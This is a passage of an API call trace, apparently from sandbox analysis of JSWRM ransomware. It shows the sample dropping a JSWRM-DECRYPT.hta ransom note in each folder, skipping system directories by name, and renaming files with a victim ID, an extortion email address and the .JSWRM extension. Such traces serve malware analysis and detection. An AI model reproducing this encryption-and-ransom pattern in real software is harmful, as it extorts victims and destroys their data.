[0068.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\jswrm-decrypt.hta")) returned 0xffffffff [0068.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.712] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.712] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.713] CloseHandle (hObject=0x454) returned 1 [0068.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\jswrm-decrypt.hta")) returned 0x20 [0068.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.713] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9e0f4e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0068.713] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.713] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9e0f4e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.713] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.714] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.714] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9e0f4e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f9e0f4e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f9e0f4e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.714] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.714] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.714] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.714] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.714] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.714] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.714] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.714] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.715] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.715] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.715] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.715] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10082418549838816) returned 0 [0068.715] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.715] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.715] CloseHandle (hObject=0xffffffff) returned 1 [0068.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0068.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0068.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.716] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.716] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.716] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2=".") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="..") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="...") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="windows") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="recovery") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="perflogs") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="documents and settings") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="$RECYCLE.BIN") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="system volume information") returned 1 [0068.716] lstrcmpiW (lpString1="zh-CN", lpString2="msocache") returned 1 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\jswrm-decrypt.hta")) returned 0xffffffff [0068.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.717] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.718] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.721] CloseHandle (hObject=0x454) returned 1 [0068.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\jswrm-decrypt.hta")) returned 0x20 [0068.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.721] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9e0f4e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0068.721] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.721] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9e0f4e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.721] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.721] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.722] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9e0f4e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f9e0f4e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f9e0f4e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.722] lstrcmpiW 